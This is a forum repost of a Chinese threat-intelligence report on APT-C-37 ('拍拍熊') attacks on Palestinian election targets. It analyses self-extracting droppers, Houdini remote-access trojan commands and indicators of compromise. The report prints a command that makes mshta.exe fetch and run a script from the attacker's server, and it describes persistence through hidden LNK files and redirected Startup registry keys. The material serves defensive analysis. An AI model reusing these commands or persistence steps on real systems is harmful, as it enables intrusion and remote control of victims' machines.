APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告

麦青儿管理员帖子:17112 注册: 2004-03-26 来自:	发表于： 2019-11-19 14:19 \| 只看楼主短消息资料字号：小中大 1楼 APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告一、背景介绍近日，瑞星威胁情报中心捕获到两起针对巴勒斯坦大选的APT攻击事件，通过对攻击手法的分析来看，发现这两起攻击均与APT组织“APT-C-37”（又称“拍拍熊”）有关。该组织通过投放伪装成巴勒斯坦选举会议的相关文档等方式进行远程控制攻击，其意图以攻击巴勒斯坦政府为主，目的在于影响巴勒斯坦国家大选。据悉，“拍拍熊”是一个中东地区背景，使用阿拉伯语且有政治动机的APT攻击组织，自2015年被发现至今，频繁进行有组织、有计划、针对性的不间断攻击，特别是针对巴勒斯坦、以色列、埃及等中东动乱国家进行攻击。“拍拍熊”组织一直保持着积极的活跃度，典型的攻击目标包括政府机构、武装组织领导、媒体人士、政治活动家和外交官等。瑞星安全专家介绍，此次截获的APT攻击事件应与近期的巴勒斯坦大选有关，通过截获的两起诱饵文件发现，其主题为选举委员会会议和Majdalani严重怀疑阿巴斯总统关于总统选举。攻击者将带有木马病毒的诱饵文档通过邮件等方式进行投放，而该病毒可自解压，一旦受害者运行了自解压的木马文件，就会被攻击者远程控制，从而可进行各种不法操作。由于“拍拍熊”组织针对的目标都是具有重大信息资产，如国家军事、情报、战略部门，以及如金融、能源等影响国计民生的行业，因此国内相关政府机构和企业单位务必要引起重视，加强防御措施。麦青儿最后编辑于 2019-11-19 14:22:11
麦青儿管理员帖子:17112 注册: 2004-03-26 来自:	分享到：

麦青儿管理员帖子:17112 注册: 2004-03-26 来自:	发表于： 2019-11-19 14:19 \| 只看楼主短消息资料字号：小中大 2楼回复: APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告二、攻击事件这两起攻击事件均是针对巴勒斯坦，攻击者投放的诱饵文档都和巴勒斯坦大选有关。第一个诱饵文档的主题是：选举委员会会议。第二个诱饵文档的主题是：Majdalani严重怀疑阿巴斯总统关于总统选举。图：诱饵文档1 图：诱饵文档2 麦青儿最后编辑于 2019-11-19 14:25:05
麦青儿管理员帖子:17112 注册: 2004-03-26 来自:

管理员

帖子:17112
注册: 2004-03-26
来自:

发表于： 2019-11-19 14:20 | 只看楼主 短消息资料

字号：小中大 3楼

回复: APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告

三、技术分析

3.1 攻击流程

图：攻击流程

3.2 自解压文件

攻击者投放的病毒样本为SFX（自解压）文件，并且图标被伪装成WORD图标。在自解压文件中有一个和巴勒斯坦大选相关的诱饵文档和一段自解压命令。

文件名	اجتماع لجنة الانتخابات – إقليم الشمال .exe
中文翻译	选举委员会会议-北领地.exe
MD5	6E62856152EB198B457487E1EED94D76
文件大小	396.71KB（406234 bytes）
文件格式	Win32 EXE
创建时间	2019-4-27
VT首次上传时间	2019-11-05
VT检测结果	37 / 70
涉及URL	http://192.119.111.4/xx/dv
内含诱饵文档名	GSHword.docx

表：自解压文件1信息

图：自解压文件1

文件名	المجدلاني يشكك بجدية الرئيس عباس بشأن الانتخابات الرئاسية.exe
中文翻译	Majdalani严重怀疑阿巴斯总统关于总统选举.exe
MD5	4FA306739FD3ECC75B0EE202A614061D
文件大小	389.28KB （398627bytes）
文件格式	Win32 EXE
创建时间	2019-4-27
VT首次上传时间	2019-11-07
VT检测结果	27 / 70
涉及URL	http://192.119.111.4/xx/dv
内含诱饵文档名	wordwatan.docx

表：自解压文件2信息

图：自解压文件2

自解压命令：

通过分析自解压命令，可以得知当受害者运行自解压文件后，病毒样本会执行如下操作：

图：自解压命令

①攻击者为了达到迷惑受害者的目的，会先将诱饵文档释放在%temp%路径下，并打开。

文件名	GSHword.docx
MD5	D99F2923C81E703C6345D30BF0E15CD9
所处目录	%temp%
VT检测结果	0 / 59

表：诱饵文档1：GSHword.docx的信息

文件名	wordwatan.docx
MD5	7E55C6E273FE45336299A7AAA46D5A2B
所处目录	%temp%
VT检测结果	0 / 62

表：诱饵文档2：wordwatan.docx的信息

②利用mshta.exe执行http://192.119.111.4/xx/dv脚本。

③为了使得攻击保持持久性，攻击者在启动菜单中下创建一个LNK文件。此LNK文件被伪装成HelPPane.lnk（windows自带帮助程序），但是它的目标属性指向：C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv。

文件名	HelPPane.lnk
MD5	F4355A61D7AC60D3282A9A207A643589
目标属性	C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv
所处目录	%appdata% \Microsoft\Windows\Start Menu\Programs\Startup
VT检测结果	样本无上报

表：HelPPane.lnk 信息

图：HelPPane.lnk的目标属性

3.3 dv.vbs

来源	http://192.119.111.4/xx/dv
MD5	7BCBE8CC5A05DF9FCEA4E7E52BD00D79
执行方式	C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv
涉及URL	http://192.119.111.4/xx/dv.zip

表：dv.vbs 信息

如下是dv.vbs执行的恶意操作：

①在%temp%目录中创建xxxx.tmp（xxxx表示随机命名）。

②从http://192.119.111.4/xx/dv.zip中获取vbs脚本并存于xxxx.tmp中。

③将xxxx.tmp文件的后缀名改为vbs，利用powershell.exe执行xxxx.vbs。

④最后将xxxx.vbs文件删除。

图：dv.vbs脚本文件

麦青儿最后编辑于 2019-11-19 14:37:38

管理员

帖子:17112
注册: 2004-03-26
来自:

发表于： 2019-11-19 14:20 | 只看楼主 短消息资料

字号：小中大 4楼

回复: APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告

3.4 dv.zip.vbs

文件名	xxxx.tmp（xxxx表示随机命名）
MD5	9094DF33AA0D6B1DD4EFAF34E91A05C4
所处目录	%temp%
来源	http://192.119.111.4/xx/dv.zip
涉及URL	http://192.119.111.4/xx/f_Skoifa.vbs

表：dv.zip.vbs 信息

如下是dv.zip.vbs执行的恶意操作：

3.4.1 下载f_Skoifa.vbs脚本

下载http://192.119.111.4/xx/f_Skoifa.vbs脚本文件，存于%USERPROFILE%\AppData\Local中。

文件名	f_Skoifa.vbs
MD5	FD5BA76F85C9746F7A326B954874F5A6
所处目录	%USERPROFILE%\AppData\Local
来源	http://192.119.111.4/xx/f_Skoifa.vbs

表：f_Skoifa.vbs 信息

图：下载f_Skoifa.vbs

3.4.2 创建Help文件夹

判断%USERPROFILE%\AppData\Roaming\Microsoft\Windows\中是否存在Help文件夹，没有则创建。

文件名	Help
所处目录	%USERPROFILE%\AppData\Roaming\Microsoft\Windows
子文件	HelpPane.lnk

表：Help 信息

图：创建Help文件夹

3.4.3 转移启动菜单为Help文件夹

（1）在注册表HKEY_CURRENT_USER中创建 SOFTWARE\Microsoft\Windows\CurrentVersion\Help。

（2）更改Windows启动目录为Help文件夹：

①在注册表HKEY_CURRENT_USER中修改 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders中的Startup值为%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help 。

②在注册表HKEY_CURRENT_USER中修改 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders中的Startup值为%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help。

图：更改注册表

3.4.4 创建指向f_Skoifa.vbs 的HelpPane.lnk

在%USERPROFILE%\AppData\Roaming\Microsoft\Windows\help文件夹中创建一个LNK文件。此LNK文件被伪装成HelpPane.lnk（windows自带帮助程序），它的属性目标指向C:\Windows\system32\wscript.exe %USERPROFILE%\AppData\Local\f_Skoifa.vbs。

文件名	HelpPane.lnk
MD5	2818ECDE79CEDC1E181D7B69F14840A6
目标属性	C:\Windows\System32\wscript.exe %USERPROFILE%\AppData\Local\f_Skoifa.vbs
所处目录	%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help
VT检测结果	样本无上报

表：HelpPane.lnk 信息

图：创建快捷方式文件

3.4.5 更改f_Skoifa.vbs和HelpPane.lnk的文件属性

攻击者为了保持持久性，将%USERPROFILE%\AppData\Local\ f_Skoifa.vbs和%USERPROFILE%\AppData\Roaming\Microsoft\Windows\help\HelpPane.lnk的文件属性更改为系统属性和隐藏属性。

图：更改文件属性

麦青儿最后编辑于 2019-11-19 14:30:17

管理员

帖子:17112
注册: 2004-03-26
来自:

发表于： 2019-11-19 14:21 | 只看楼主 短消息资料

字号：小中大 5楼

回复: APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告

3.5 f_Skoifa.vbs

f_Skoifa.vbs是个被加密的远控木马，解密后对其进行技术分析发现其就是远控木马Houdini。

文件名	f_Skoifa.vbs
MD5	FD5BA76F85C9746F7A326B954874F5A6
所处目录	%USERPROFILE%\AppData\Local
来源	http://192.119.111.4/xx/f_Skoifa.vbs
涉及URL	http://192.119.111.4:4587/is-ready http:// 192.119.111.4:4587 / is-enum-driver http:// 192.119.111.4:4587 / is-sending http:// 192.119.111.4:4587 / is-enum-faf http:// 192.119.111.4:4587 / is-enum-process

表：_Skoifa.vbs 信息

图：f_Skoifa.vbs密文

图：f_Skoifa.vbs明文

图：发送信息和接收远控指令

3.5.2 八个远控指令名分析

攻击者发送过来的远控木马的攻击指令总计8个，每个远控指令的结构为：

远控指令名<|>指令参数1（<|>指令参数2）。样本从远控指令中解析出远控指令名，然后根据远控指令名对受害者机器发动相应地攻击。

下面分别对这8个远控指令名进行详细分析。

图：远控指令

①远控指令名：excecute

调用VBScript中的execute函数，直接执行指令参数1。指令参数1可以是一段pwoershell或其他。

图：远控指令名excecute

②远控指令名：send

远控指令名send的作用是下载文件以执行。
远控指令名send对应的远控指令结构为：

send<|>fileurl<|>filedir。包含两个指令参数，指令参数1表示C2地址的文件路径，指令参数2表示受害者机器上的文件目录。数据传输方式为POST，从http:// 192.119.111.4:4587 / is-sending<|> fileurl（指令参数1）中获取文件，文件命名为fileurl（指令参数1）斜线（\）后的字符。文件存储于filedir（指令参数2）中。

下载前判断受害者机器上是否存在被下载的文件，如果存在则将其删除，然后重新下载，下载完后利用wscript.shell将文件执行起来。

图：远控指令名send

图：远控指令名send对应的操作函数

③远控指令名：recv

此次攻击中，远控指令名recv的对应的操作函数upload并不存在。但是从之前的攻击案例中可以得知，这个远控指令的作用是更新载荷。

图：远控指令名recv

图：远控指令名enum-driver

图：远控指令名enum-driver对应的操作函数

图：远控指令名enum-faf

图：远控命令enum-faf对应的操作函数

⑥远控指令名：enum-process

远控指令名enum-process对应的作用是向C2地址（http:// 192.119.111.4:4587 / is-enum-process）发送由受害者机器上的进程名，进程ID和进程对应的可执行文件路径组成的列表。

发送列表的记录结构为：

进程1的名称｜进程1的ID｜进程1对应的可执行文件地址<|>……进程n的名称｜进程n的ID｜进程n对应的可执行文件地址<|>。

图：远控指令名enum-process

图：远控指令名enum-process对应的函数操作

⑦远控指令名：delete

此次攻击中，远控指令名delete对应的操作函数deletefaf并不存在。但是通过分析之前的案例可以得知这个指令的作用是删除文件。

图：远控指令名delete

⑧远控指令名：exit-process

远控指令名exit-process的作用是通过进程ID（指令参数1）终止指定进程。

图：远控指令名exit-process

图：远控指令名exit-process对应的操作函数

麦青儿最后编辑于 2019-11-19 14:33:39

麦青儿管理员帖子:17112 注册: 2004-03-26 来自:	发表于： 2019-11-19 14:21 \| 只看楼主短消息资料字号：小中大 6楼回复: APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告四、总结此次最新的攻击案例中涉及到的攻击手法和今年其他相关安全厂商披露的攻击事件中所用到的技术有很大的重合性。攻击者熟练使用阿拉伯语，针对目标为巴勒斯坦，攻击手法采用SFX（自解压文件）和mshta.exe去远程执行脚本文件，最终投递Houdini远控木马。 APT攻击有着针对性强、组织严密、持续时间长、高隐蔽性和间接攻击的显著特征，针对的目标都是具有重大信息资产，如国家军事、情报、战略部门和影响国计民生的行业如金融、能源等，国内相关政府机构和企业单位务必要引起重视，加强防御措施。五、预防措施 1.不打开可疑邮件，不下载可疑附件。此类攻击最开始的入口通常都是钓鱼邮件，钓鱼邮件非常具有迷惑性，因此需要用户提高警惕，企业更是要加强员工网络安全意识的培训。 2.部署网络安全态势感知、预警系统等网关安全产品。网关安全产品可利用威胁情报追溯威胁行为轨迹，帮助用户进行威胁行为分析、定位威胁源和目的，追溯攻击的手段和路径，从源头解决网络威胁，最大范围内发现被攻击的节点，帮助企业更快响应和处理。 3.安装有效的杀毒软件，拦截查杀恶意文档和木马病毒。杀毒软件可拦截恶意文档和木马病毒，如果用户不小心下载了恶意文档，杀毒软件可拦截查杀，阻止病毒运行，保护用户的终端安全。 4.及时修补系统补丁和重要软件的补丁。六、IOC信息 URL http://192.119.111.4/xx/dv http://192.119.111.4/xx/dv.zip http://192.119.111.4/xx/f_Skoifa.vbs http://192.119.111.4:4587/is-ready http://192.119.111.4:4587 / is-enum-driver http://192.119.111.4:4587 / is-sending http://192.119.111.4:4587 / is-enum-faf http://192.119.111.4:4587 / is-enum-process MD5 6E62856152EB198B457487E1EED94D76 7BCBE8CC5A05DF9FCEA4E7E52BD00D79 9094DF33AA0D6B1DD4EFAF34E91A05C4 FD5BA76F85C9746F7A326B954874F5A6 4FA306739FD3ECC75B0EE202A614061D 2818ECDE79CEDC1E181D7B69F14840A6 F4355A61D7AC60D3282A9A207A643589 麦青儿最后编辑于 2019-11-19 14:46:01
麦青儿管理员帖子:17112 注册: 2004-03-26 来自:

天月来了版主帖子:76904 注册: 2007-02-06 来自:	发表于： 2019-11-19 16:15 \| 短消息资料字号：小中大 7楼回复：APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告普通用户分辨不了假冒文档
天月来了版主帖子:76904 注册: 2007-02-06 来自:

麦青儿管理员帖子:17112 注册: 2004-03-26 来自:	发表于： 2019-11-19 17:32 \| 只看楼主短消息资料字号：小中大 8楼回复 7F 天月来了的帖子是滴，留给杀毒软件搞定就行
麦青儿管理员帖子:17112 注册: 2004-03-26 来自:

天月来了版主帖子:76904 注册: 2007-02-06 来自:	发表于： 2019-11-20 08:21 \| 短消息资料字号：小中大 9楼回复 8F 麦青儿的帖子普通用户不安装杀毒软件，即便安装了，弹出的提示也是点击允许运行，点击加入白名单因为人家太想打开这个文件看看到底是什么嘛你各家杀毒软件老干扰我工作噶啥呀
天月来了版主帖子:76904 注册: 2007-02-06 来自:

麦青儿管理员帖子:17112 注册: 2004-03-26 来自:	发表于： 2019-11-20 15:04 \| 只看楼主短消息资料字号：小中大 10楼回复 9F 天月来了的帖子你身边人这样的那恐怕是因为他们身边有你，中了招找天月呗，有啥可紧张的
麦青儿管理员帖子:17112 注册: 2004-03-26 来自:

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

麦青儿管理员帖子:17112 注册: 2004-03-26 来自:	发表于： 2019-11-19 14:19 \| 只看楼主短消息资料字号：小中大 1楼 APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告一、背景介绍近日，瑞星威胁情报中心捕获到两起针对巴勒斯坦大选的APT攻击事件，通过对攻击手法的分析来看，发现这两起攻击均与APT组织“APT-C-37”（又称“拍拍熊”）有关。该组织通过投放伪装成巴勒斯坦选举会议的相关文档等方式进行远程控制攻击，其意图以攻击巴勒斯坦政府为主，目的在于影响巴勒斯坦国家大选。据悉，“拍拍熊”是一个中东地区背景，使用阿拉伯语且有政治动机的APT攻击组织，自2015年被发现至今，频繁进行有组织、有计划、针对性的不间断攻击，特别是针对巴勒斯坦、以色列、埃及等中东动乱国家进行攻击。“拍拍熊”组织一直保持着积极的活跃度，典型的攻击目标包括政府机构、武装组织领导、媒体人士、政治活动家和外交官等。瑞星安全专家介绍，此次截获的APT攻击事件应与近期的巴勒斯坦大选有关，通过截获的两起诱饵文件发现，其主题为选举委员会会议和Majdalani严重怀疑阿巴斯总统关于总统选举。攻击者将带有木马病毒的诱饵文档通过邮件等方式进行投放，而该病毒可自解压，一旦受害者运行了自解压的木马文件，就会被攻击者远程控制，从而可进行各种不法操作。由于“拍拍熊”组织针对的目标都是具有重大信息资产，如国家军事、情报、战略部门，以及如金融、能源等影响国计民生的行业，因此国内相关政府机构和企业单位务必要引起重视，加强防御措施。麦青儿最后编辑于 2019-11-19 14:22:11
麦青儿管理员帖子:17112 注册: 2004-03-26 来自:	分享到：

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛 APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告

[转载] APT组织“拍拍熊”对巴勒斯坦政府攻击事件报告